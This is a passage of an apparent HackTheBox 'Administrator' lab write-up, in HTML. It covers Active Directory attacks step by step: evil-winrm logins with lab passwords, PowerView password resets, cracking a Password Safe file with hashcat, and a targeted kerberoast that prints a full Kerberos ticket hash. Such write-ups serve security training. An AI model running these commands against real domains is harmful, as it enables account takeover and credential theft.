url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRElEQVR42q1STU/CQBDlqDF+hJMmHgiHQlG6pWWhpZ9Y+gG0BEpBICSaeNeL/0D/93O3gAEST3J4yczs5L03O1OQWjZOicJ+QjQHUts5aCAsJ0c1Dpm6kFvu34REc1EnJgi1UVM6EBlqW4gNHQ+qgcemmUNqORDUJgSFghyR5oSNzhMEQcHFvIiiWoIXTOENJnCCBH6SIclWLB5B7/Zh9IYgoomzxRXO0xtUyhSS7qBOrQ0hVyRM8b4q4vLrGp/rAKvsFfFsjcFkgXA0Q2+YwmREuhuB2j4kYuH2o4S79zKIbEMxupC1jdOC1YsRJjNE6TP6yzG+X94QRmPmJGYNFqqylo/PR+Yu/eE0d91PmFg8R8AEvUEK2082hJxZNTyobGxV81ChXNHLa/ztYCnb+LfW3i1u7w/57PsgrLiL/302p7jDH/IgK/KRWCU/AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="olivia First Degree Object Control" title="" src="/static/0bd15d064b30ab99f449d93f0dbaa661/7a752/olivia-object-control.png" srcset="/static/0bd15d064b30ab99f449d93f0dbaa661/dda05/olivia-object-control.png 158w, /static/0bd15d064b30ab99f449d93f0dbaa661/679a3/olivia-object-control.png 315w, /static/0bd15d064b30ab99f449d93f0dbaa661/7a752/olivia-object-control.png 588w" sizes="(max-width: 588px) 100vw, 588px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>GenericAll gives the trustee full control over the target object which can be leveraged for a targeted kerberoast attack or to change the user's password.</p> <p>Searching for <code class="language-text">michael</code> and viewing First Degree Object Control showed that the user had ForceChangePassword rights over the <code class="language-text">benjamin</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 607px; " > <a class="gatsby-resp-image-link" href="/static/a601485513d592ef63318486237a3a0e/281c2/michael-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.708860759493675%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABN0lEQVR42nWRTU+DQBCGiYkevJqYNJ6sJhqBguWjhYUFulDKh61gMWo9WA/+hF5M/OuvC5aGajw8mezOu+/szAgDk6JFGXlQTb+Je3Q0OxptwPP790LXTDIIrjUToubgZmjzSHZIugPZcLcPuVYnuNBVyFxbv90zlE0uVClOtDMcfhzDHjOUqzXS4gnLlzWq13c8PL8hnlcY+zEsN0FPOsfB5gi9yz4GhgeRF6gLCrX7kATQtQlO8ys8bix8FivQtADjOCyDFcxg0gimG8FmKWyaQokJ+l8i1NCFRWcYeVOoYx+C7jCEWflDvkSZV5hzIxJmjVnbbs2tFWCS3CNIFmBJCRaW8OMFvOkdaJRjyPPC72GLvH2Jf72dS3cpMqc1r2coGqRzdpr8H0Nly+AflG2RbrHuUr4B6TLqz1NTOp0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="michael First Degree Object Control" title="" src="/static/a601485513d592ef63318486237a3a0e/281c2/michael-object-control.png" srcset="/static/a601485513d592ef63318486237a3a0e/dda05/michael-object-control.png 158w, /static/a601485513d592ef63318486237a3a0e/679a3/michael-object-control.png 315w, /static/a601485513d592ef63318486237a3a0e/281c2/michael-object-control.png 607w" sizes="(max-width: 607px) 100vw, 607px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>First Degree Group Memberships for <code class="language-text">benjamin</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/722e7f7ac02bf615dd2f5d381ea10f70/87eb3/benjamin-group-membership.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABmklEQVR42pWTx07DQBCG8xxIHJEAJ05x3Mu6x2m20w9JThEHeAFOPPvP7EY2EVKMOfzy7Gj222nuyJqHNurrrJascfm/fNe4ThtYT3UhKbbQ68gmn4GhoZLt1P7u2GkPVOwIpp8JWeESySJAuddg+HM6X/26l/4N5KVIiiOA6WKDaXlAPF/DS3KwtCTl8NIl3GQBM8gagLonSngdWZTBFPnuBJu+MpXOS67KlITtNJRMoKEa0EUG1U0wyXfIir2wqwu3g7g7FN70nkYauXgwn6DGDPnmCINNRAYcdnupSQI4MH0obgx5YOHxTcbq8wtpthYBHMYfbLteHR7sT3Kkyy1Nb4Nse0Rx+sDhfMHp8i78fCjdsdsK/FOyEGVEjX4ZaHgemiLAjeco9mfx2MDw67i+3gCsml03/eZcTVBnKexoBs1LCMzXKSAwuw9s2sWql1xD6ndfC+HFElRHJTCrK/zXr6dYIS31BkFWIJyuUR4yzFYFArLDaQknmtNDrB2wypQPh4PHTkSZJhhZESkU4v1tneFtpvdU9fAbW3L0JVbb2CoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="benjamin First Degree Group Memberships" title="" src="/static/722e7f7ac02bf615dd2f5d381ea10f70/50637/benjamin-group-membership.png" srcset="/static/722e7f7ac02bf615dd2f5d381ea10f70/dda05/benjamin-group-membership.png 158w, /static/722e7f7ac02bf615dd2f5d381ea10f70/679a3/benjamin-group-membership.png 315w, /static/722e7f7ac02bf615dd2f5d381ea10f70/50637/benjamin-group-membership.png 630w, /static/722e7f7ac02bf615dd2f5d381ea10f70/87eb3/benjamin-group-membership.png 646w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">Share Moderators</code> group didn’t seem to have any interesting privileges in BloodHound, however, this group would likely have more access to either SMB or FTP.</p> <p>Next, I used <code class="language-text">evil-winrm</code> to log in as <code class="language-text">olivia</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ evil-winrm -i 10.10.11.42 -u 'olivia' -p 'ichliebedich' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\olivia\Documents> whoami administrator\olivia</code></pre></div> <p>I uploaded PowerView:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> upload PowerView.ps1 Info: Uploading /home/kali/Desktop/HTB/Administrator/PowerView.ps1 to C:\programdata\PowerView.ps1 Data: 1206372 bytes of 1206372 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 10/4/2024 10:07 AM Microsoft d----- 10/30/2024 4:42 PM MySQL d----- 10/22/2024 11:50 AM Package Cache d----- 10/5/2024 10:17 AM regid.1991-06.com.microsoft d----- 5/8/2021 1:20 AM SoftwareDistribution d----- 5/8/2021 2:36 AM ssh d----- 10/4/2024 10:21 AM USOPrivate d----- 5/8/2021 1:20 AM USOShared d----- 10/22/2024 11:51 AM VMware -a---- 1/2/2025 1:38 PM 904779 PowerView.ps1</code></pre></div> <p>I attempted a targeted kerberoast on <code class="language-text">michael</code>, but the password didn't easily crack. So instead, I changed the password of the user. To do so, first I created a PSCredential object for <code class="language-text">olivia</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('administrator\olivia', $password)</code></pre></div> <p>Then, I created a secure string object for the new password:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $UserPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force</code></pre></div> <p>After that, I set the new password using <code class="language-text">Set-DomainUserPassword</code> from PowerView:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $cred</code></pre></div> <p>Using the newly set password, I was able to log in as <code class="language-text">michael</code> over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ evil-winrm -i 10.10.11.42 -u 'michael' -p 'P@ssw0rd' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\michael\Documents> whoami administrator\michael</code></pre></div> <p>With this access, the same process can be followed to change the password for the <code class="language-text">benjamin</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('administrator\michael', $password) *Evil-WinRM* PS C:\programdata> $UserPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $cred</code></pre></div> <p>The <code class="language-text">benjamin</code> user had access to the FTP server which contained a Password Safe database:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ ftp 10.10.11.42 Connected to 10.10.11.42. 220 Microsoft FTP Service Name (10.10.11.42:kali): benjamin 331 Password required Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||60232|) 125 Data connection already open; Transfer starting. 10-05-24 08:13AM 952 Backup.psafe3 226 Transfer complete.</code></pre></div> <p>I downloaded <code class="language-text">Backup.psafe3</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">ftp> get Backup.psafe3 local: Backup.psafe3 remote: Backup.psafe3 229 Entering Extended Passive Mode (|||60233|) 125 Data connection already open; Transfer starting. 100% |********************************************| 952 15.38 KiB/s 00:00 ETA 226 Transfer complete. WARNING! 3 bare linefeeds received in ASCII mode. File may not have transferred correctly. 952 bytes received in 00:00 (15.16 KiB/s)</code></pre></div> <p>I used <code class="language-text">hashcat</code> to crack the safe combination:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting &lt;...snip...> Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Backup.psafe3:tekieromucho Session..........: hashcat Status...........: Cracked Hash.Mode........: 5200 (Password Safe v3) Hash.Target......: Backup.psafe3 &lt;...snip...></code></pre></div> <p>I opened <code class="language-text">Backup.psafe3</code> in Password Safe:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 598px; " > <a class="gatsby-resp-image-link" href="/static/813d4974161820489a9a20aedbf07c49/89d5f/password-safe.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB+0lEQVR42l1SyZKbMBTkJ5KZlAezrxISFmKRMXiZVHJJbqkkk6oc8/+f0HkCu8rjQ4MET0/dr9tJMoEwqRDdIU4r+BFHpWa05oJmuEATZDNjGwq8BAJBXCGgmuVMzBDlLTz1E06cCPq4Ik7lgjCRKEuB8yDRK4VRK+wbhWNf05tj1gxFIZGVzd3ZGn4s4UR3DcN4ZehHFcqC4/eU4e2Q4++c420u8OdY4MeB4d9rgmGnUNUjEiJwI+MHBTG8fghjgVqN0N2MRk9QBCtxp2d4kcTGY3B9jm3Aac3hhQxeUOKekB+WcOzDNrXzKJiihhPafkU/zOjoPZgjmsZAERpNl7YjXWiIgMHGjZEWO6j2vHjhuF6KNKdZpAKsasFlB7kbCAYZFa4m0WwXWau0JJN0Ri77IGILuyTlCEKSvHEjfPi4Ifo5KtmjG47EbkZvTmBc42WbwvWyB6RXrHubiHr+hSjTcLZ+hqdPLp6eXZTUwEreNSNJO4ALTXPLsPXzd/CIyW1tG9sIcf0dQaJWl5OsXuNCP0Q9oBI9hBzQdkcaQ0eyrPvyCrHUKLrQqhnMGbI2MOMZWV7bhvJdlpruBDN9JfkGtwRED1k9Xb5hGL9Q4z2YMOj3n5cIeT65bId6D1b15NhMhqglBo//w5gTm9elpmCaHFa0npb6JK/xHzc3TV2n/tiSAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Password Safe" title="" src="/static/813d4974161820489a9a20aedbf07c49/89d5f/password-safe.png" srcset="/static/813d4974161820489a9a20aedbf07c49/dda05/password-safe.png 158w, /static/813d4974161820489a9a20aedbf07c49/679a3/password-safe.png 315w, /static/813d4974161820489a9a20aedbf07c49/89d5f/password-safe.png 598w" sizes="(max-width: 598px) 100vw, 598px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There were passwords for three users in the safe:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 491px; " > <a class="gatsby-resp-image-link" href="/static/d134a52680158aee21225765280480d8/5c810/backup-psafe3.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACB0lEQVR42q1U25KaQBDlS5JFBFGuKhdFroNcRdEYs65bu1XJ///DSYOmsptUJT7sw6nuge4zp6d7hvv0WcZAUAkaBFHHw0CBqrvwwwxhlBMKLFdrJOkGCathuxF4iu9ie0g6JNmEpPp4WPwAp5sLIlhgZgWQJxbmTghFc+AFGSwnhmYue5KhZEAcmeCHWr/pgOyg9zty8omcF3RwznKN8/mEeN3gcn5CVuxRFg3yfIvjlxPKssHp/B11c8LMSVCRzesjXC+DH1VYU/xilZNfw3LjjjDD4+XS/3x9eaXStqjrA1jaoGlabOod0uKIsv5KiQWa3RP5J6qgIhEtbfQNQbzpCV0Sx1kuQ729oGkvCNmOFDyi3J7RHp5Rkd3un5GVRxjzmBSyG9Lezt2bpfXUZlAMD5xmrpDkFbKqRUAqWd4izfdEcqDyWxRUXrdWdA8qxarGDW99ItKmPsaqA44XTFixgShniEh6GFdwqaursOj9gGAvYkjjGWGO0eSKP32JGiqIBjhhOIOX2UiqbkRqsGyHhBoU0xnGbAPPzyDKXaL1T8iKTZNgEqE4gx1Z8FOGVVDS4ZKyhJRFJSJ27dxVzZ2E4mhKCXavoksU5Wtpb/E/sr8IR7S4J+l+wskHEg7pOn0woXEbifvxe1zef+vuM9e9HL8u+j3g6TEYKxY9Jj4kqu7df1HDT7KA4dXt+18wAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Password Safe Backup.psafe3" title="" src="/static/d134a52680158aee21225765280480d8/5c810/backup-psafe3.png" srcset="/static/d134a52680158aee21225765280480d8/dda05/backup-psafe3.png 158w, /static/d134a52680158aee21225765280480d8/679a3/backup-psafe3.png 315w, /static/d134a52680158aee21225765280480d8/5c810/backup-psafe3.png 491w" sizes="(max-width: 491px) 100vw, 491px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I checked each of the users in BloodHound and the only user in <code class="language-text">Remote Management Users</code> was <code class="language-text">emily</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2e8295e2497df5638b2ecafced2508f6/397ed/emily-group-membership.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.15189873417721%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdUlEQVR42pWT226CQBRF/ZA+9KVJLcULCOgAw1UuCkqxGFMTn/sB/YV+9+6Z8ZK2MSIPJ8NkyDp7n9nTG5gcXerV8G+e99oAQ+sEmnDoNoOfKlANrxtQNVyMZwHSdQMvXSEp31Fs9khXNcpNQfuGvhvEyxpxsQGfF7eBQ8s7qXJghws48RITJ6JGopl/OW9VqJouBpYLRXckLK+2WLztMJr6UvXxP/f+GQ5N6j7xYUcLsvYBh1ZFt3/B2qt3tjbQOR41FQ/JE/JiS2o5XjSG0Q17V4FiLgaPwfgSSqTD//5Ec/hCmJXSan/MJLwD0AULMnmbYVrBi2pEdHv17kC29wjy6nLznSyLUkTpTFp9Hs+gsVDGI8jW0ChGR3DHYItInEuo6hN4YHow3LnM5mhq0p5dRPxX3vpSBMTiCQFjWF6OdaODJyFMnmHqJfR6ovuBorvGAmmZJyXNU6wVPT+aNe3deUnQ9E82WxUK6DnoR4v25fua5R+90dKbPyDjIQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="emily First Degree Group Memberships" title="" src="/static/2e8295e2497df5638b2ecafced2508f6/50637/emily-group-membership.png" srcset="/static/2e8295e2497df5638b2ecafced2508f6/dda05/emily-group-membership.png 158w, /static/2e8295e2497df5638b2ecafced2508f6/679a3/emily-group-membership.png 315w, /static/2e8295e2497df5638b2ecafced2508f6/50637/emily-group-membership.png 630w, /static/2e8295e2497df5638b2ecafced2508f6/397ed/emily-group-membership.png 647w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> shell as <code class="language-text">emily</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\emily\Documents> whoami administrator\emily *Evil-WinRM* PS C:\Users\emily\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\emily\desktop> ls Directory: C:\Users\emily\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk -ar--- 1/2/2025 9:04 AM 34 user.txt</code></pre></div> <p>Further enumeration in BloodHound revealed that <code class="language-text">emily</code> had GenericWrite over <code class="language-text">ethan</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 615px; " > <a class="gatsby-resp-image-link" href="/static/d0f465d20e28de51aa17a2b8bd8bec51/daa8e/emily-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRUlEQVR42p1Ry07CQBRtjAt14V4SFgqJ0NIHdErp+wVYoVVQDBghGhaNO1d+gB/gNx9nRhsRcePi5J65c+bMfQhK18d/IXe9XzlhO6GZIRQzgLoFdldGxaQ6I4RGIs7/NJQND+dtAkl3IHZsDsZbxmclLeLyquS2j6rRQMWuQ1bdH6ZCWbpmRjipn2Hv5QA1TcRiVeD2/gl3yzWW62dMF4+I0mu4gzHUpovDh2Psvx6hVlWh9Fgx7rehSn/QuwkqVhPi2yneF3PE6QROMgJx+yBOgo4VQaeR5ezgEtLKRLMg6AUXsMIUHTvmHQqsDSceYZjP0L+aIcunKCZzBMOcC3mbVMgim6E/yJCMb5DEU0TBhOu8fgaDfswNy2FrVoh2L6Q8RIMth3KtXEIJ+qCcr0QcSIbDzwzy15yFTfFOvgPb29/c8gfpNQpfm0JNegAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="emily First Degree Object Control" title="" src="/static/d0f465d20e28de51aa17a2b8bd8bec51/daa8e/emily-object-control.png" srcset="/static/d0f465d20e28de51aa17a2b8bd8bec51/dda05/emily-object-control.png 158w, /static/d0f465d20e28de51aa17a2b8bd8bec51/679a3/emily-object-control.png 315w, /static/d0f465d20e28de51aa17a2b8bd8bec51/daa8e/emily-object-control.png 615w" sizes="(max-width: 615px) 100vw, 615px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ethan</code> had DCSync on the domain:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ba2af0761ef8eda9c7987fc30c1e0e71/0cdc5/ethan-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZUlEQVR42oWSWU/CUBCF+0N81kREaKldoMstXWlpy2KRJREflBd8Mf7/HGeuqCEBeTi5S++c+Wamyr3h4ZzudIdWF5afwg5G0OwArd4A7Qf3bIxy6pIDWG48xnA0gZeU8GgfZDWdp9D6Q5msY/qXDdmIH4bFDE5UwBIpTCI0vETunbBANJ7TXXKo4B/Dn1LSqpEkXlxKSkFkLE7A5yCtUcxWMokkPWloerjt9TGaLFFMlxAUNAhzSRITESfhBLbI4CcVsnqB+foFqiWOSKVhx/LRUh3kkzW2b3tEVC73jGnYVKVhcBt4KG40/iV9en7FdvdO3/6qU9o0xU5P4Eq/xmK/wGqzQ1zOpSmThPkM5eMGFSkpG0nO4h5X9RLN5wdumgqaToaUVNH6AbyohJjmKEleWEJ3I3SpFCaSoqmymFQ93HUp2ORBBRnMIJWtkIRcCgerRkDYAl1bHP06lyRbxu+N75K/AHlnNkV0aIHeAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ethan First Degree Object Control" title="" src="/static/ba2af0761ef8eda9c7987fc30c1e0e71/50637/ethan-object-control.png" srcset="/static/ba2af0761ef8eda9c7987fc30c1e0e71/dda05/ethan-object-control.png 158w, /static/ba2af0761ef8eda9c7987fc30c1e0e71/679a3/ethan-object-control.png 315w, /static/ba2af0761ef8eda9c7987fc30c1e0e71/50637/ethan-object-control.png 630w, /static/ba2af0761ef8eda9c7987fc30c1e0e71/0cdc5/ethan-object-control.png 879w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So I used the GenericWrite privilege to run a targeted kerberoast on <code class="language-text">ethan</code>. In the WinRM shell as <code class="language-text">emily</code>, I first created a PSCredential object for <code class="language-text">emily</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force *Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('administrator\emily', $password)</code></pre></div> <p>Then using PowerView, I set an SPN for <code class="language-text">ethan</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1 *Evil-WinRM* PS C:\programdata> Set-DomainObject -Credential $cred -Identity ethan -SET @{serviceprincipalname='new/TEST'}</code></pre></div> <p>Attempting to request the TGS resulted in a clock skew error:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ impacket-GetUserSPNs -dc-ip 10.10.11.42 administrator.htb/emily -request-user ethan Impacket v0.11.0 - Copyright 2023 Fortra Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ----- -------- -------------------------- --------- ---------- new/TEST ethan 2024-10-12 16:52:14.117811 &lt;never> [-] CCache file is not found. Skipping... [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</code></pre></div> <p>I used <code class="language-text">ntpdate</code> to sync the clock on my local machine with the DC:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ sudo ntpdate -u dc.administrator.htb 2025-01-02 18:30:41.921008 (-0500) +383.456846 +/- 0.062728 dc.administrator.htb 10.10.11.42 s1 no-leap CLOCK: time stepped by 383.456846</code></pre></div> <p>I was then able to retrieve the TGS for <code class="language-text">ethan</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ impacket-GetUserSPNs -dc-ip 10.10.11.42 administrator.htb/emily -request-user ethan Impacket v0.11.0 - Copyright 2023 Fortra Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ----- -------- -------------------------- --------- ---------- new/TEST ethan 2024-10-12 16:52:14.117811 &lt;never> [-] CCache file is not found. Skipping... $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$9f83d419ead644eaf77e344cdfc3a3fb$39e5bdd9d85a3a3870ee7f6ff9faa916480b2615f69c36812cb2342d211db199bdc9ee45665c7a075af20eee935826a03e4a38e609007dbc4b0d7244512f79a73708160eb65a4ea67e823cff2875a6c36cb59b64daf687dcb5ab522520e8d2144ded21723b08897239135a3bf1713144d3867a1a828e35d0025e09f84acd5516f43b48578c98d7e7c2a39bd40b02d4106c0c356fac178d71bd833d3e6514451762b764976887f7371f9b5e63a9cf42ab2aa16975f9ad361559df6a03b9c2da86795455fd83680b977e411c1292669566f0beb6b13b5d9414c96ad4806183724698d9f784134545d5a179f10646188e9474bc6331a4b1209b3312ab95c54209f183026ebc0358cd032826f973e015844a34c4f40847d9fd2d126d3be99cfe1b24bc75e9e262087a4aa5752ad274d90406cb649721e9c2c4a2a40f0fef2548329fef12c867b984621f7f9b401b77036fb4b6bcb39fc215472c62e1a0c8433ac111f407af12ee951366ed11a247e2d4ff85eb4c235909a39d1719e4a7c4ef5f081c74cace8418432fb6825f5d94eceaff8259e79105dc6913bebfb117e11b09e3ecedbe557da245e494478c16efb4c1f62cf1aa57b91f8cfa6e6e2dc96fa08dd9b7dd1dc7cc26f5c6097f9ffc0438047d67576607e9d49613ddc943773bebfaf3945f7e9a082239a2558994b223dc99e73ed35a066a8c63113d99b38f7efc4d991a33d71f3ef2a2485853e59e4284580cf0a52d93e4a36ef209fdc9aea95416dbf2f604a2b771a86b73a8d6ea226c509583d4c0d043c32f76e7abfe19846be9ed24a2bf6bf084e7732564030f4d1560a87d3c3e14b0f9843d3fc6c2f00209e9289460d735efb06d192d28c2df2da38cf9797d358a7ac39a314f84df1e1a67f4aa4416ebbb99bd79f23fd97d5e31bac902d3a2ce880aa6341cb5999fadbecbca7594b39c2c76f6602fb65670e60d44e7085436dfd15c2cfdb2fa9ace3c317c20c2980a9b5422c549519207ca2c64f05629f0962b8f4d1c24b7078ccc13f75590884b96689fca1b12bae6e145d9504c008c697562f0b86915425ca16a25dbc394df67f601285249bd521dd04a1f8b8aa32cc0748c6259e271b70914aa0e5a458a08b4cbe1569e31a04a1fce0a9e058b77b58866f7914cd78200ec0b45d5c699ed5ea8df52759a750b7b238e7898e079f0d43c8073f55e64d3294f57de648fb44a8d42b8d4280fc09edb2fa3cde129b8181e56c6b549257a90232b111fd11bf4bd34a07e0ec5e54b128e7c69a097b100248000d0ca2cb7bfd6d72b03a9e3ee1fc786afb238a7e1db38280232b1cbd1197b38fa144daa7370b03f97b9268409899fc1ca21bf72d34a2c21551522bb494fbfeadf2d72666a0d5690cf1d3027339c71d484d0cd821f983a6adedd8b87568a5195bf74ea93c9ee55b5605ceabee0db8ee38d7e39774c2e2dd8ce6224c2abc63284e2bfc33d65d668934098062b175c6703f2befc1eba7ccaab2e1e1b02c7bd4aa8b01e8d41852e4165b5168ff697228e32</code></pre></div> <p><code class="language-text">hashcat</code> cracked the password:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code 